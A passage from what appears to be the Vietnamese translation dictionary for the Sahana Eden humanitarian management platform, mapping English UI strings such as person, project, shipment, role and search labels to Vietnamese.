ký', 'Pending Requests': 'Yêu cầu đang chờ', 'Pending': 'Đang xử lý', 'People Trapped': 'Người bị mắc kẹt', 'People': 'Người', 'Percentage': 'Phần trăm', 'Performance Rating': 'Đánh giá quá trình thực hiện', 'Permanent Home Address': 'Địa chỉ thường trú', 'Permanent': 'Biên chế', 'Person (Count)': 'Họ tên (Số lượng)', 'Person Details': 'Thông tin cá nhân', 'Person Registry': 'Cơ quan đăng ký nhân sự', 'Person added to Commitment': 'Người được thêm vào Cam kết', 'Person added to Group': 'Người được thêm vào Nhóm', 'Person added to Team': 'Người được thêm vào Đội', 'Person added': 'Người được thêm vào', 'Person deleted': 'Người đã xóa', 'Person details updated': 'Thông tin cá nhân được cập nhật', 'Person must be specified!': 'Người phải được chỉ định!', 'Person or OU': 'Người hay OU', 'Person removed from Commitment': 'Người đã xóa khỏi Cam kết', 'Person removed from Group': 'Người đã xóa khỏi Nhóm', 'Person removed from Team': 'Người đã xóa khỏi Đội', 'Person reporting': 'Người báo cáo', 'Person who has actually seen the person/group.': 'Người đã thực sự nhìn thấy người/ nhóm', 'Person who observed the presence (if different from reporter).': 'Người quan sát tình hình (nếu khác với người báo cáo)', 'Person': 'Họ tên', 'Personal Effects Details': 'Chi tiết đồ dùng cá nhân', 'Personal Profile': 'Hồ sơ cá nhân', 'Personal': 'Cá nhân', 'Personnel': 'Nhân viên', 'Persons with disability (mental)': 'Người tàn tật (về tinh thần)', 'Persons with disability (physical)': 'Người tàn tật (về thể chất)', 'Persons': 'Họ tên', 'Philippine Pesos': 'Đồng Pê sô Phi-lip-pin', 'Phone #': 'Số điện thoại', 'Phone 1': 'Điện thoại 1', 'Phone 2': 'Điện thoại 2', 'Phone number is required': 'Yêu cầu nhập số điện thoại', 'Phone': 'Điện thoại', 'Photo Details': 'Thông tin về ảnh', 'Photo added': 'Ảnh được thêm vào', 'Photo deleted': 'Ảnh đã xóa', 'Photo updated': 'Ảnh được cập nhật', 'Photograph': 'Ảnh', 'Photos': 'Những bức ảnh', 'Place of Birth': 'Nơi sinh', 'Place of registration for health-check and medical treatment': 'Nơi đăng ký khám chữa bệnh', 'Place of registration': 'Nơi đăng ký BHXH', 'Place on Map': 'Vị trí trên bản đồ', 'Place': 'Nơi', 'Planned %(date)s': 'Đã lập kế hoạch %(date)s', 'Planned Procurement Item': 'Mặt hàng mua sắm theo kế hoạch', 'Planned Procurement': 'Mua sắm theo kế hoạch', 'Planned Procurements': 'Những trường hợp mua sắm đã lập kế hoạch', 'Planned': 'Đã lập kế hoạch', 'Please do not remove this sheet': 'Xin vui lòng không xóa bảng này', 'Please enter a First Name': 'Vui lòng nhập tên', 'Please enter a Warehouse/Facility/Office OR an Organization': 'Xin vui lòng nhập một Nhà kho/ Bộ phận/ Văn phòng HOẶC một Tổ chức', 'Please enter a Warehouse/Facility/Office': 'Xin vui lòng nhập một Nhà kho/ Bộ phận/ Văn phòng', 'Please enter a first name': 'Xin vui lòng nhập một tên', 'Please enter a last name': 'Xin vui lòng nhập một họ', 'Please enter a number only': 'Vui lòng chỉ nhập một số', 'Please enter a valid email address': 'Vui lòng nhập địa chỉ email hợp lệ', 'Please enter a valid email address.': 'Vui lòng nhập địa chỉ email hợp lệ', 'Please enter an Organization/Supplier': 'Xin vui lòng nhập một Tổ chức/ Nhà cung cấp', 'Please enter the first few letters of the Person/Group for the autocomplete.': 'Xin vui lòng nhập những chữ cái đầu tiên của Tên/ Nhóm để tự động dò tìm.', 'Please enter the recipient(s)': 'Xin vui lòng nhập người nhận', 'Please fill this!': 'Xin vui lòng nhập thông tin vào đây!', 'Please provide the URL of the page you are referring to, a description of what you expected to 
happen & what actually happened.': 'Vui lòng cung cấp đường dẫn trang bạn muốn tham chiếu tới, miêu tả bạn thực sự muốn gì và cái gì đã thực sự xảy ra.', 'Please record Beneficiary according to the reporting needs of your project': 'Xin vui lòng lưu thông tin Người hưởng lợi theo những nhu cầu về báo cáo của dự án của bạn', 'Please review demographic data for': 'Xin vui lòng rà soát lại số liệu dân số để', 'Please review indicator ratings for': 'Xin vui lòng rà soát lại những đánh giá về chỉ số để', 'Please select another level': 'Xin vui lòng lựa chọn một cấp độ khác', 'Please select': 'Xin vui lòng lựa chọn', 'Please use this field to record any additional information, including a history of the record if it is updated.': 'Vui lòng sử dụng ô này để điền thêm các thông tin bổ sung, bao gồm cả lịch sử của hồ sơ nếu được cập nhật.', 'Please use this field to record any additional information, such as Ushahidi instance IDs. Include a history of the record if it is updated.': 'Xin vui lòng sử dụng ô này để điền thông tin bổ sung, như là tên truy nhập phiên bản Ushahidi. Bao gồm một lịch sử của hồ sơ nếu được cập nhật.', 'PoIs successfully imported.': 'PoIs đã được nhập thành công.', 'Poisoning': 'Sự nhiễm độc', 'Poisonous Gas': 'Khí độc', 'Policy Development': 'Xây dựng chính sách', 'Political Theory Education': 'Trình độ Lý luận chính trị', 'Pollution and other environmental': 'Ô nhiễm và các vấn đề môi trường khác', 'Polygon': 'Đa giác', 'Poor': 'Nghèo', 'Population Report': 'Báo cáo dân số', 'Population': 'Dân số', 'Popup Fields': 'Các trường cửa sổ tự động hiển thị', 'Popup Label': 'Nhãn cửa sổ tự động hiển thị', 'Porridge': 'Cháo yến mạch', 'Port Closure': 'Cổng đóng', 'Port': 'Cổng', 'Portable App': 'Ứng dụng di động', 'Portal at': 'Cổng thông tin', 'Position': 'Vị trí', 'Positions': 'Những vị trí', 'Post Graduate': 'Trên đại học', 'Postcode': 'Mã bưu điện', 'Posts': 'Thư tín', 'Poultry restocking, Rank': 'Thu mua gia cầm, thứ hạng', 'Power Failure': 'Lỗi nguồn điện', 'Powered by ': 'Cung cấp bởi', 'Powered by Sahana Eden': 'Cung cấp bởi Sahana Eden', 'Powered by': 'Cung cấp bởi', 'Preferred Name': 'Tên thường gọi', 'Presence Condition': 'Điều kiện xuất hiện', 'Presence Log': 'Lịch trình xuất hiện', 'Presence': 'Sự hiện diện', 'Previous View': 'Hiển thị trước', 'Previous': 'Trang trước', 'Primary': 'Sơ cấp', 'Principal Officer': 'Chuyên viên chính', 'Print / Share': 'In ra / Chia sẻ', 'Print Extent': 'Kích thước in', 'Print Map': 'In bản đồ', 'Printed from Sahana Eden': 'Được in từ Sahana Eden', 'Printing disabled since server not accessible': 'Chức năng in không thực hiện được do không thể kết nối với máy chủ', 'Priority from 1 to 9. 1 is most preferred.': 'Thứ tự ưu tiên từ 1 đến 9. 
1 được ưu tiên nhất.', 'Priority': 'Ưu tiên', 'Privacy': 'Riêng tư', 'Private-Public Partnerships': 'Hợp tác tư nhân và nhà nước', 'Problem Administration': 'Quản lý vấn đề', 'Problem connecting to twitter.com - please refresh': 'Vấn đề khi kết nối với twitter.com - vui lòng làm lại', 'Problem updated': 'Đã cập nhật vấn đề', 'Problem': 'Vấn đề', 'Problems': 'Vấn đề', 'Procedure': 'Thủ tục', 'Process Received Shipment': 'Thủ tục nhận lô hàng', 'Process Shipment to Send': 'Thủ tục gửi lô hàng', 'Processing': 'Đang xử lý', 'Procured': 'Được mua', 'Procurement Plans': 'Kế hoạch mua sắm', 'Profession': 'Nghề nghiệp', 'Professional Experience Details': 'Thông tin về kinh nghiệm nghề nghiệp', 'Professional Experience added': 'Kinh nghiệm nghề nghiệp đã được thêm vào', 'Professional Experience deleted': 'Kinh nghiệm nghề nghiệp đã xóa', 'Professional Experience updated': 'Kinh nghiệp nghề nghiệp được cập nhật', 'Professional Experience': 'Kinh nghiệm nghề nghiệp', 'Profile Configuration removed': 'Cấu hình hồ sơ đã xóa', 'Profile Configuration updated': 'Cấu hình hồ sơ được cập nhật', 'Profile Configuration': 'Cấu hình hồ sơ', 'Profile Configurations': 'Các cấu hình hồ sơ', 'Profile Configured': 'Hồ sơ đã được cài đặt cấu hình', 'Profile Details': 'Thông tin về hồ sơ', 'Profile Picture': 'Ảnh hồ sơ', 'Profile Picture?': 'Ảnh đại diện?', 'Profile': 'Hồ sơ', 'Profiles': 'Các hồ sơ', 'Program (Count)': 'Chương trình (Số lượng)', 'Program Details': 'Thông tin về chương trình', 'Program Hours (Month)': 'Thời gian tham gia chương trình (Tháng)', 'Program Hours (Year)': 'Thời gian tham gia chương trình (Năm)', 'Program Hours': 'Thời gian tham gia chương trình', 'Program added': 'Chương trình đã được thêm vào', 'Program deleted': 'Chương trình đã xóa', 'Program updated': 'Chương trình được cập nhật', 'Program': 'Chương trình tham gia', 'Programme Planning and Management': 'Quản lý và lập kế hoạch Chương trình', 'Programme Preparation and Action Plan, Budget & Schedule': 'Xây dựng Chương trình và Kế hoạch hành động, lập ngân sách và lịch hoạt động', 'Programs': 'Chương trình', 'Project Activities': 'Các hoạt động của dự án', 'Project Activity': 'Hoạt động của dự án', 'Project Assessments and Planning': 'Lập kế hoạch và đánh giá dự án', 'Project Beneficiary Type': 'Nhóm người hưởng lợi của dự án', 'Project Beneficiary': 'Người hưởng lợi của dự án', 'Project Calendar': 'Lịch dự án', 'Project Details': 'Thông tin về dự án', 'Project Name': 'Tên dự án', 'Project Organization Details': 'Thông tin về tổ chức của dự án', 'Project Organization updated': 'Tổ chức dự án được cập nhật', 'Project Organizations': 'Các tổ chức dự án', 'Project Time Report': 'Báo cáo thời gian dự án', 'Project Title': 'Tên dự án', 'Project added': 'Dự án được thêm vào', 'Project deleted': 'Dự án đã xóa', 'Project not Found': 'Không tìm thấy dự án', 'Project updated': 'Dự án được cập nhật', 'Project': 'Dự án', 'Projection Details': 'Thông tin dự đoán', 'Projection Type': 'Loại dự báo', 'Projection added': 'Dự đoán được thêm vào', 'Projection deleted': 'Dự đoán đã xóa', 'Projection updated': 'Dự đoán được cập nhật', 'Projection': 'Dự đoán', 'Projections': 'Nhiều dự đoán', 'Projects Map': 'Bản đồ dự án', 'Projects': 'Dự án', 'Proposed': 'Được đề xuất', 'Protecting Livelihoods': 'Bảo vệ Sinh kế', 'Protocol': 'Giao thức', 'Provide Metadata for your media files': 'Cung cấp lý lịch dữ liệu cho các tệp tin đa phương tiện', 'Provide a password': 'Cung cấp mật khẩu', 'Provider': 'Nơi đăng ký BHYT', 'Province': 'Tỉnh/thành', 'Provision of Tools and 
Equipment': 'Cung cấp công cụ và trang thiết bị', 'Proxy Server URL': 'Máy chủ ủy nhiệm URL', 'Psychiatrics/Pediatric': 'Khoa thần kinh/Khoa nhi', 'Psychosocial Support': 'Hỗ trợ tâm lý', 'Public Administration Education': 'Trình độ Quản lý nhà nước', 'Public Event': 'Sự kiện dành cho công chúng', 'Public and private transportation': 'Phương tiện vận chuyển công cộng và cá nhân', 'Public': 'Công khai', 'Purchase Data': 'Dữ liệu mua hàng', 'Purchase Date': 'Ngày mua hàng', 'Purchase': 'Mua hàng', 'Purpose': 'Mục đích', 'Pyroclastic Flow': 'Dòng dung nham', 'Pyroclastic Surge': 'Núi lửa phun trào', 'Python Serial module not available within the running Python - this needs installing to activate the Modem': 'Modun số liệu Python không sẵn có trong Python đang chạy - cần cài đặt để kích hoạt modem', 'Python needs the ReportLab module installed for PDF export': 'Chưa cài đặt kho báo cáo', 'Python needs the xlrd module installed for XLS export': 'Chạy Python cần xlrd module được cài đặt để chiết xuất định dạng XLS', 'Python needs the xlwt module installed for XLS export': 'Chạy Python cần xlwt module được cài đặt để chiết xuất định dạng XLS', 'Quantity Committed': 'Số lượng cam kết', 'Quantity Fulfilled': 'Số lượng đã được cung cấp', 'Quantity Received': 'Số lượng đã nhận được', 'Quantity Returned': 'Số lượng được trả lại', 'Quantity Sent': 'Số lượng đã gửi', 'Quantity in Transit': 'Số lượng đang được vận chuyển', 'Quantity': 'Số lượng', 'Quarantine': 'Cách ly để kiểm dịch', 'Queries': 'Thắc mắc', 'Query Feature': 'Đặc tính thắc mắc', 'Query': 'Yêu cầu', 'Queryable?': 'Có thể yêu cầu?', 'Question Details': 'Thông tin về câu hỏi', 'Question Meta-Data Details': 'Chi tiết lý lịch dữ liệu về câu hỏi', 'Question Meta-Data added': 'Lý lịch dữ liệu về câu hỏi được thêm vào', 'Question Meta-Data deleted': 'Lý lịch dữ liệu về câu hỏi đã xóa', 'Question Meta-Data updated': 'Lý lịch dữ liệu về câu hỏi được cập nhật', 'Question Meta-Data': 'Lý lịch dữ liệu về câu hỏi', 'Question Summary': 'Tóm tắt câu hỏi', 'Question': 'Câu hỏi', 'RC historical employment record': 'Quá trình công tác tại Hội', 'READ': 'ĐỌC', 'REPORTS': 'BÁO CÁO', 'RESET': 'THIẾT LẬP LẠI', 'RESILIENCE': 'AN TOÀN', 'REST Filter': 'Bộ lọc REST', 'RFA Priorities': 'Những ưu tiên RFA', 'RFA1: Governance-Organisational, Institutional, Policy and Decision Making Framework': 'RFA1: Quản trị - Về tổ chức, Về thể chế, Chính sách và Khung ra quyết định', 'RFA2: Knowledge, Information, Public Awareness and Education': 'RFA2: Kiến thức, Thông tin, Nhận thức của công chúng và Đào tạo', 'RFA3: Analysis and Evaluation of Hazards, Vulnerabilities and Elements at Risk': 'RFA3: Phân tích và Đánh giá Hiểm họa, Tình trạng dễ bị tổn thương và Những yếu tố dễ gặp rủi ro', 'RFA4: Planning for Effective Preparedness, Response and Recovery': 'RFA4: Lập kế hoạch cho Chuẩn bị, Ứng phó và Phục hồi hiệu quả', 'RFA5: Effective, Integrated and People-Focused Early Warning Systems': 'RFA5: Hệ thống cảnh báo sớm hiệu quả, tích hợp và chú trọng vào con người', 'RFA6: Reduction of Underlying Risk Factors': 'RFA6: Giảm thiểu những nhân tố rủi ro cơ bản', 'Race': 'Chủng tộc', 'Radio Callsign': 'Tín hiệu điện đàm', 'Radiological Hazard': 'Hiểm họa phóng xạ', 'Railway Accident': 'Tai nạn đường sắt', 'Railway Hijacking': 'Cướp tàu hỏa', 'Rain Fall': 'Mưa lớn', 'Rapid Assessments': 'Đánh giá nhanh', 'Rapid Close Lead': 'Nhanh chóng đóng lại', 'Rapid Data Entry': 'Nhập dữ liệu nhanh', 'Raw Database access': 'Truy cập cơ sở dữ liệu gốc', 'Ready': 'Sẵn sàng', 'Reason': 'Lý do', 
'Receive %(opt_in)s updates:': 'Nhận %(opt_in)s cập nhật:', 'Receive New Shipment': 'Nhận lô hàng mới', 'Receive Shipment': 'Nhận lô hàng', 'Receive updates': 'Nhận cập nhật', 'Receive': 'Nhận', 'Receive/Incoming': 'Nhận/ Đến', 'Received By': 'Nhận bởi', 'Received Shipment Details': 'Thông tin về lô hàng nhận', 'Received Shipment canceled': 'Lô hàng nhận đã bị hoãn', 'Received Shipment updated': 'Lô hàng nhận đã được cập nhật', 'Received Shipments': 'Hàng nhận', 'Received date': 'Ngày nhận', 'Received': 'Đã được nhận', 'Received/Incoming Shipments': 'Lô hàng nhận/đến', 'Receiving Inventory': 'Nhận hàng tồn kho', 'Reception': 'Nhận', 'Recipient': 'Người nhận', 'Recipient(s)': 'Người nhận', 'Recipients': 'Những người nhận', 'Record Deleted': 'Hồ sơ bị xóa', 'Record Details': 'Chi tiết hồ sơ', 'Record added': 'Hồ sơ được thêm', 'Record already exists': 'Bản lưu đã tồn tại', 'Record approved': 'Hồ sơ được chấp thuận', 'Record could not be approved.': 'Hồ sơ không được chấp thuận', 'Record could not be deleted.': 'Hồ sơ không thể xóa', 'Record deleted': 'Hồ sơ bị xóa', 'Record not found!': 'Không tìm thấy bản lưu!', 'Record not found': 'Không tìm thấy hồ sơ', 'Record updated': 'Hồ sơ được cập nhật', 'Record': 'Hồ sơ', 'Records': 'Các hồ sơ', 'Recovery Request added': 'Đã thêm yêu cầu phục hồi', 'Recovery Request deleted': 'Đã xóa yêu cầu phục hồi', 'Recovery Request updated': 'Cập nhật Yêu cầu phục hồi', 'Recovery Request': 'Yêu cầu phục hồi', 'Recovery Requests': 'Các yêu cầu phục hồi', 'Recovery': 'Phục hồi', 'Recurring costs': 'Chi phí định kỳ', 'Recurring': 'Định kỳ', 'Red Cross & Red Crescent National Societies': 'Các Hội Chữ thập đỏ & Trăng lưỡi liềm đỏ Quốc gia', 'Red Cross Employment History': 'Quá trình công tác trong Chữ thập đỏ', 'Refresh Rate (seconds)': 'Tỉ lệ làm mới (giây)', 'Region Location': 'Địa điểm vùng', 'Region': 'Vùng', 'Regional': 'Địa phương', 'Register As': 'Đăng ký là', 'Register Person into this Shelter': 'Đăng ký cá nhân vào nơi cư trú', 'Register Person': 'Đăng ký Cá nhân', 'Register for Account': 'Đăng ký tài khoản', 'Register': 'Đăng ký', 'Registered People': 'Những người đã đăng ký', 'Registered users can %(login)s to access the system': 'Người sử dụng đã đăng ký có thể %(login)s để truy cập vào hệ thống', 'Registered users can': 'Người dùng đã đăng ký có thể', 'Registration Details': 'Chi tiết đăng ký', 'Registration added': 'Bản đăng ký đã được thêm', 'Registration not permitted': 'Việc đăng ký không được chấp thuận', 'Reject request submitted': 'Đề nghị từ chối đã được gửi đi', 'Reject': 'Từ chối', 'Relationship': 'Mối quan hệ', 'Relief Team': 'Đội cứu trợ', 'Religion': 'Tôn giáo', 'Reload': 'Tải lại', 'Remarks': 'Những nhận xét', 'Remember Me': 'Duy trì đăng nhập', 'Remote Error': 'Lỗi từ xa', 'Remove Feature: Select the feature you wish to remove & press the delete key': 'Chức năng gỡ bỏ: Lựa chọn chức năng bạn muốn gỡ bỏ và ấn phím xóa', 'Remove Human Resource from this incident': 'Xóa nguồn Nhân lực khỏi sự việc này', 'Remove Layer from Profile': 'Xóa Lớp khỏi Hồ sơ', 'Remove Layer from Symbology': 'Xóa Lớp khỏi Biểu tượng', 'Remove Organization from Project': 'Xóa Tổ chức khỏi Dự án', 'Remove Person from Commitment': 'Xóa Người khỏi Cam kết', 'Remove Person from Group': 'Xóa Người khỏi Nhóm', 'Remove Person from Team': 'Xóa Người khỏi Đội', 'Remove Profile Configuration for Layer': 'Xóa Cấu hình hồ sơ cho Lớp', 'Remove Skill from Request': 'Xóa Kỹ năng khỏi Đề nghị', 'Remove Skill': 'Xóa Kỹ năng', 'Remove Stock from Warehouse': 'Xóa Hàng hóa khỏi Nhà 
kho', 'Remove Symbology from Layer': 'Xóa Biểu tượng khỏi Lớp', 'Remove Vehicle from this incident': 'Xóa Phương tiện khỏi sự việc này', 'Remove all log entries': 'Xóa toàn bộ ghi chép nhật ký', 'Remove all': 'Gỡ bỏ toàn bộ', 'Remove existing data before import': 'Xóa dữ liệu đang tồn tại trước khi nhập', 'Remove selection': 'Gỡ bỏ có lựa chọn', 'Remove this entry': 'Gỡ bỏ hồ sơ này', 'Remove': 'Gỡ bỏ', 'Reopened': 'Được mở lại', 'Repacked By': 'Được đóng gói lại bởi', 'Repair': 'Sửa chữa', 'Repaired': 'Được sửa chữa', 'Repeat your password': 'Nhập lại mật khẩu', 'Repeat': 'Lặp lại', 'Replace if Newer': 'Thay thế nếu mới hơn', 'Replace': 'Thay thế', 'Replacing or Provisioning Livelihoods': 'Thay thế hoặc Cấp phát sinh kế', 'Replies': 'Trả lời', 'Reply Message': 'Trả lời tin nhắn', 'Reply': 'Trả lời', 'Report Date': 'Ngày báo cáo', 'Report Details': 'Chi tiết báo cáo', 'Report Options': 'Lựa chọn yêu cầu báo cáo', 'Report To': 'Báo cáo cho', 'Report Type': 'Loại báo cáo', 'Report a Problem with the Software': 'Báo cáo lỗi của phần mềm', 'Report added': 'Đã thêm báo cáo', 'Report by Age/Gender': 'Báo cáo theo tuổi/ giới tính', 'Report deleted': 'Đã xóa báo cáo', 'Report my location': 'Báo cáo vị trí của tôi', 'Report of': 'Báo cáo theo', 'Report on Annual Budgets': 'Báo cáo về Ngân sách năm', 'Report on Themes': 'Báo cáo về Chủ đề', 'Report the contributing factors for the current EMS status.': 'Báo cáo các nhân tố đóng góp cho tình trạng EMS hiện tại.', 'Report': 'Báo cáo', 'Reported By (Not Staff)': 'Được báo cáo bởi (không phải nhân viên)', 'Reported By (Staff)': 'Được báo cáo bởi (nhân viên)', 'Reported To': 'Được báo cáo tới', 'Reported': 'Được báo cáo', 'Reportlab not installed': 'Chưa cài đặt ReportLab', 'Reports': 'Báo cáo', 'Repositories': 'Nơi lưu trữ', 'Repository Base URL': 'URL cơ sở của nơi lưu trữ', 'Repository Configuration': 'Cấu hình nơi lưu trữ', 'Repository Name': 'Tên nơi lưu trữ', 'Repository UUID': 'Lưu trữ UUID', 'Repository configuration deleted': 'Cấu hình nơi lưu trữ đã xóa', 'Repository configuration updated': 'Cấu hình nơi lưu trữ được cập nhật', 'Repository configured': 'Nơi lưu trữ đã được cấu hình', 'Repository': 'Nơi lưu trữ', 'Request Added': 'Đề nghị được thêm vào', 'Request Canceled': 'Đề nghị đã bị hủy', 'Request Details': 'Chi tiết yêu cầu', 'Request From': 'Đề nghị từ', 'Request Item Details': 'Chi tiết mặt hàng đề nghị', 'Request Item added': 'Đã thêm yêu cầu hàng hóa', 'Request Item deleted': 'Xóa yêu cầu hàng hóa', 'Request Item updated': 'Đã cập nhật hàng hóa yêu cầu', 'Request Item': 'Mặt hàng yêu cầu', 'Request Items': 'Mặt hàng yêu cầu', 'Request New People': 'Yêu cầu cán bộ mới', 'Request Status': 'Tình trạng lời đề nghị', 'Request Stock from Available Warehouse': 'Đề nghị Hàng từ Kho hàng đang có', 'Request Type': 'Loại hình đề nghị', 'Request Updated': 'Đề nghị được cập nhật', 'Request added': 'Yêu cầu được thêm', 'Request deleted': 'Yêu cầu được xóa', 'Request for Role Upgrade': 'Yêu cầu nâng cấp vai trò', 'Request from Facility': 'Đề nghị từ bộ phận', 'Request updated': 'Yêu cầu được cập nhật', 'Request': 'Yêu cầu', 'Request, Response & Session': 'Yêu cầu, Phản hồi và Tương tác', 'Requested By': 'Đã được đề nghị bởi', 'Requested For Facility': 'Được yêu cầu cho bộ phận', 'Requested For': 'Đã được đề nghị cho', 'Requested From': 'Đã được đề nghị từ', 'Requested Items': 'Yêu cầu mặt hàng', 'Requested Skill Details': 'Chi tiết kỹ năng đã đề nghị', 'Requested Skill updated': 'Kỹ năng được đề nghị đã được cập nhật', 
'Requested Skills': 'Những kỹ năng được đề nghị', 'Requested by': 'Yêu cầu bởi', 'Requested': 'Đã được đề nghị', 'Requester': 'Người đề nghị', 'Requestor': 'Người yêu cầu', 'Requests Management': 'Quản lý những đề nghị', 'Requests for Item': 'Yêu cầu hàng hóa', 'Requests': 'Yêu cầu', 'Required Skills': 'Những kỹ năng cần có ', 'Requires Login!': 'Đề nghị đăng nhập!', 'Requires Login': 'Đề nghị đăng nhập', 'Reset Password': 'Cài đặt lại mật khẩu', 'Reset all filters': 'Tái thiết lập tất cả lựa chọn lọc', 'Reset filter': 'Tái thiết lập lựa chọn lọc', 'Reset form': 'Đặt lại mẫu', 'Reset': 'Thiết lập lại', 'Resolution': 'Nghị quyết', 'Resource Configuration': 'Cấu hình nguồn lực', 'Resource Management System': 'Hệ thống quản lý nguồn lực', 'Resource Mobilization': 'Huy động nguồn lực', 'Resource Name': 'Tên nguồn lực', 'Resource configuration deleted': 'Cấu hình nguồn lực đã xóa', 'Resource configuration updated': 'Cầu hình nguồn lực được cập nhật', 'Resource configured': 'Nguồn lực đã được cấu hình', 'Resources': 'Những nguồn lực', 'Responder(s)': 'Người ứng phó', 'Response deleted': 'Xóa phản hồi', 'Response': 'Ứng phó', 'Responses': 'Các đợt ứng phó', 'Restarting Livelihoods': 'Tái khởi động nguồn sinh kế', 'Results': 'Kết quả', 'Retail Crime': 'Chiếm đoạt tài sản để bán', 'Retrieve Password': 'Khôi phục mật khẩu', 'Return to Request': 'Trở về Đề nghị', 'Return': 'Trở về', 'Returned From': 'Được trả lại từ', 'Returned': 'Đã được trả lại', 'Returning': 'Trả lại', 'Review Incoming Shipment to Receive': 'Rà soát Lô hàng đến để Nhận', 'Review next': 'Rà soát tiếp', 'Review': 'Rà soát', 'Revised Quantity': 'Số lượng đã được điều chỉnh', 'Revised Status': 'Tình trạng đã được điều chỉnh', 'Revised Value per Pack': 'Giá trị mỗi Gói đã được điều chỉnh', 'Riot': 'Bạo động', 'Risk Identification & Assessment': 'Đánh giá và Xác định rủi ro', 'Risk Transfer & Insurance': 'Bảo hiểm và hỗ trợ tài chính nhằm ứng phó với rủi ro', 'Risk Transfer': 'Hỗ trợ tài chính nhằm ứng phó với rủi ro', 'River Details': 'Chi tiết Sông', 'River': 'Sông', 'Road Accident': 'Tai nạn đường bộ', 'Road Closed': 'Đường bị chặn', 'Road Delay': 'Cản trở giao thông đường bộ', 'Road Hijacking': 'Tấn công trên đường', 'Road Safety': 'An toàn đường bộ', 'Road Usage Condition': 'Tình hình sử dụng đường sá', 'Role Details': 'Chi tiết về vai trò', 'Role Name': 'Tên chức năng', 'Role Required': 'Chức năng được yêu cầu', 'Role added': 'Vai trò được thêm vào', 'Role assigned to User': 'Chức năng được cấp cho người sử dụng này', 'Role deleted': 'Vai trò đã xóa', 'Role updated': 'Vai trò được cập nhật', 'Role': 'Vai trò', 'Roles Permitted': 'Các chức năng được cho phép', 'Roles currently assigned': 'Các chức năng được cấp hiện tại', 'Roles of User': 'Các chức năng của người sử dụng', 'Roles updated': 'Các chức năng được cập nhật', 'Roles': 'Vai trò', 'Room Details': 'Chi tiết về phòng', 'Room added': 'Phòng được thêm vào', 'Room deleted': 'Phòng đã xóa', 'Room updated': 'Phòng được cập nhật', 'Room': 'Phòng', 'Rooms': 'Những phòng', 'Rotation': 'Sự luân phiên', 'Rows in table': 'Các hàng trong bảng', 'Rows selected': 'Các hàng được chọn', 'Rows': 'Các dòng', 'Run Functional Tests': 'Kiểm thử chức năng', 'Run every': 'Khởi động mọi hàng', 'S3Pivottable unresolved dependencies': 'Các phụ thuộc không được xử lý S3pivottable', 'SMS Modems (Inbound & Outbound)': 'Modem SMS (gửi ra & gửi đến)', 'SMS Outbound': 'SMS gửi ra', 'SMS Settings': 'Cài đặt tin nhắn', 'SMS settings updated': 'Cập nhật cài đặt SMS', 'SMTP to SMS settings updated': 'Cập nhật 
cài đặt SMTP to SMS', 'SOPS and Guidelines Development': 'Xây dựng Hướng dẫn và Quy trình chuẩn', 'STRONG': 'MẠNH', 'SUBMIT DATA': 'GỬI DỮ LIỆU', 'Sahana Administrator': 'Quản trị viên Sahana', 'Sahana Community Chat': 'Nói chuyện trên cộng đồng Sahana', 'Sahana Eden Humanitarian Management Platform': 'Diễn đàn Quản lý nhân đạo Sahana Eden', 'Sahana Eden Website': 'Trang thông tin Sahana Eden', 'Sahana Eden portable application generator': 'Bộ sinh ứng dụng cầm tay Sahana Eden', 'Sahana Login Approval Pending': 'Chờ chấp nhận đăng nhập vào Sahana', 'Salary': 'Lương', 'Salary Coefficient': 'Hệ số', 'Sale': 'Bán hàng', 'Satellite': 'Vệ tinh', 'Save and add Items': 'Lưu và thêm Hàng hóa', 'Save and add People': 'Lưu và thêm Người', 'Save any Changes in the one you wish to keep': 'Lưu mọi thay đổi ở bất kỳ nơi nào bạn muốn', 'Save search': 'Lưu tìm kiếm', 'Save this search': 'Lưu tìm kiếm này', 'Save': 'Lưu', 'Save: Default Lat, Lon & Zoom for the Viewport': 'Lưu: Mặc định kinh độ, vĩ độ & phóng ảnh cho cổng nhìn', 'Saved Queries': 'Các thắc mắc được lưu', 'Saved Searches': 'Những tìm kiếm đã lưu', 'Saved search added': 'Tìm kiếm đã lưu đã được thêm vào', 'Saved search deleted': 'Tìm kiếm được lưu đã xóa', 'Saved search details': 'Chi tiết về tìm kiếm đã lưu', 'Saved search updated': 'Tìm kiếm đã lưu đã được cập nhật', 'Saved searches': 'Những tìm kiếm đã lưu', 'Scale of Results': 'Phạm vi của kết quả', 'Scale': 'Kích thước', 'Scanned Copy': 'Bản chụp điện tử', 'Scanned Forms Upload': 'Tải lên mẫu đã quyét', 'Scenarios': 'Các kịch bản', 'Schedule synchronization jobs': 'Các công việc được điều chỉnh theo lịch trình', 'Schedule': 'Lịch trình', 'Scheduled Jobs': 'Công việc đã được lập kế hoạch', 'Schema': 'Giản đồ', 'School Closure': 'Đóng cửa trường học', 'School Health': 'CSSK trong trường học', 'School Lockdown': 'Đóng cửa trường học', 'School tents received': 'Đã nhận được lều gửi cho trường học ', 'School/studying': 'Trường học', 'Seaport': 'Cảng biển', 'Seaports': 'Các cảng biển', 'Search & List Catalog': 'Tìm kiếm và liệt kê các danh mục', 'Search & List Category': 'Tìm và liệt kê danh mục', 'Search & List Items': 'Tìm kiếm và hiển thị danh sách hàng hóa', 'Search & List Locations': 'Tìm và liệt kê các địa điểm', 'Search & List Sub-Category': 'Tìm kiếm và lên danh sách Tiêu chí phụ', 'Search & Subscribe': 'Tìm kiếm và Đặt mua', 'Search Activities': 'Tìm kiếm hoạt động', 'Search Addresses': 'Tìm kiếm địa chỉ', 'Search Affiliations': 'Tìm kiếm chi nhánh', 'Search Aid Requests': 'Tìm kiếm Yêu cầu cứu trợ', 'Search Alternative Items': 'Tìm kiếm mục thay thế', 'Search Annual Budgets': 'Tìm kiếm các ngân sách năm', 'Search Assessments': 'Tìm kiếm các đánh giá', 'Search Asset Log': 'Tìm kiếm nhật ký tài sản', 'Search Assets': 'Tìm kiếm tài sản', 'Search Assigned Human Resources': 'Tìm kiếm người được phân công', 'Search Beneficiaries': 'Tìm kiếm những người hưởng lợi', 'Search Beneficiary Types': 'Tìm kiếm những nhóm người hưởng lợi', 'Search Branch Organizations': 'Tìm kiếm tổ chức chi nhánh', 'Search Brands': 'Tìm kiếm nhãn hàng', 'Search Budgets': 'Tìm kiếm các ngân sách', 'Search Catalog Items': 'Tìm kiếm mặt hàng trong danh mục', 'Search Catalogs': 'Tìm kiếm danh mục', 'Search Certificates': 'Tìm kiếm chứng chỉ', 'Search Certifications': 'Tìm kiếm bằng cấp', 'Search Checklists': 'Tìm kiếm Checklist', 'Search Clusters': 'Tìm kiếm nhóm', 'Search Commitment Items': 'Tìm kiếm mục cam kết', 